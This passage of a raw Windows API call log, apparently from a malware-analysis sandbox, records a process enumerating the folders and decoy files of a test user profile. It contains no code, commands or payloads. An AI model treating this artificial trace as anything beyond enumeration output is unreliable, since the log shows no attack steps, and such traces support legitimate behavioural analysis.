hHeap=0x660000) returned 1 [0056.395] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.395] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0056.395] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.395] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.395] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.395] PathFindFileNameW (pszPath="") returned="" [0056.395] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b658 | out: hHeap=0x660000) returned 1 [0056.396] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.396] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.396] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0056.396] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0056.396] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0056.396] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0056.396] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0056.396] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.396] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.396] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0056.396] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.396] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.396] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.396] PathFindFileNameW (pszPath="") returned="" [0056.396] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.397] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.397] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.397] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0056.397] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0056.397] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0056.397] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0056.397] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.397] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.397] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0056.397] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.397] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.397] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.397] PathFindFileNameW (pszPath="") returned="" [0056.397] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0056.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.397] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.398] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0056.398] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.398] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.398] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.398] PathFindFileNameW (pszPath="") returned="" [0056.398] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x729fd50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x729fd50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x729fd50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x729fd50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fed6af0, ftCreationTime.dwHighDateTime=0x1d4cc9a, ftLastAccessTime.dwLowDateTime=0x9d0d7770, ftLastAccessTime.dwHighDateTime=0x1d4d3af, ftLastWriteTime.dwLowDateTime=0x9d0d7770, ftLastWriteTime.dwHighDateTime=0x1d4d3af, nFileSizeHigh=0x0, nFileSizeLow=0xe431, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cwxc45T02ajINP1wUK.wav", cAlternateFileName="CWXC45~1.WAV")) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x6871d5a0, ftLastAccessTime.dwHighDateTime=0x1d4d342, ftLastWriteTime.dwLowDateTime=0x6871d5a0, ftLastWriteTime.dwHighDateTime=0x1d4d342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eIv9rDB", cAlternateFileName="")) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71884ac0, ftCreationTime.dwHighDateTime=0x1d4cca3, ftLastAccessTime.dwLowDateTime=0x8fe086e0, ftLastAccessTime.dwHighDateTime=0x1d4c74e, ftLastWriteTime.dwLowDateTime=0x8fe086e0, ftLastWriteTime.dwHighDateTime=0x1d4c74e, nFileSizeHigh=0x0, nFileSizeLow=0xa78b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="klr3tCyH3.wav", cAlternateFileName="KLR3TC~1.WAV")) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x8b298c90, ftLastAccessTime.dwHighDateTime=0x1d4d546, ftLastWriteTime.dwLowDateTime=0x8b298c90, ftLastWriteTime.dwHighDateTime=0x1d4d546, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m4--j", cAlternateFileName="")) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x37d1b3a0, ftLastWriteTime.dwHighDateTime=0x1d4d402, nFileSizeHigh=0x0, nFileSizeLow=0xbb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3", cAlternateFileName="YHNTYW~1.MP3")) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x37d1b3a0, ftLastWriteTime.dwHighDateTime=0x1d4d402, nFileSizeHigh=0x0, nFileSizeLow=0xbb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3", cAlternateFileName="YHNTYW~1.MP3")) returned 0 [0056.398] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.398] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.398] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0056.398] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.398] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.399] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.399] PathFindFileNameW (pszPath="") returned="" [0056.399] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x37d1b3a0, ftLastWriteTime.dwHighDateTime=0x1d4d402, nFileSizeHigh=0x0, nFileSizeLow=0xbb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3", cAlternateFileName="YHNTYW~1.MP3")) returned 0xffffffff [0056.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.399] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.399] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0056.399] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.399] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.399] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.399] PathFindFileNameW (pszPath="") returned="" [0056.399] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x37d1b3a0, ftLastWriteTime.dwHighDateTime=0x1d4d402, nFileSizeHigh=0x0, nFileSizeLow=0xbb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3", cAlternateFileName="YHNTYW~1.MP3")) returned 0xffffffff [0056.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.399] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.399] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0056.399] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.400] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.400] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.400] PathFindFileNameW (pszPath="") returned="" [0056.400] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x741cb10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x741cb10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x741cb10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x741cb10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae81c2c0, ftCreationTime.dwHighDateTime=0x1d4ca24, ftLastAccessTime.dwLowDateTime=0xbac96e90, ftLastAccessTime.dwHighDateTime=0x1d4d102, ftLastWriteTime.dwLowDateTime=0xbac96e90, ftLastWriteTime.dwHighDateTime=0x1d4d102, nFileSizeHigh=0x0, nFileSizeLow=0x12e4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="02fNEn45dPvMPAwyDJ.bmp", cAlternateFileName="02FNEN~1.BMP")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23af6a0, ftCreationTime.dwHighDateTime=0x1d4cf2d, ftLastAccessTime.dwLowDateTime=0x839ad970, ftLastAccessTime.dwHighDateTime=0x1d4d451, ftLastWriteTime.dwLowDateTime=0x839ad970, ftLastWriteTime.dwHighDateTime=0x1d4d451, nFileSizeHigh=0x0, nFileSizeLow=0x12c14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2JD7dc-DViv9j UmdwX.bmp", cAlternateFileName="2JD7DC~1.BMP")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7e1240, ftCreationTime.dwHighDateTime=0x1d4cdc8, ftLastAccessTime.dwLowDateTime=0xb0be800, ftLastAccessTime.dwHighDateTime=0x1d4c8c1, ftLastWriteTime.dwLowDateTime=0xb0be800, ftLastWriteTime.dwHighDateTime=0x1d4c8c1, nFileSizeHigh=0x0, nFileSizeLow=0x7e99, dwReserved0=0xa0000003, dwReserved1=0x0, 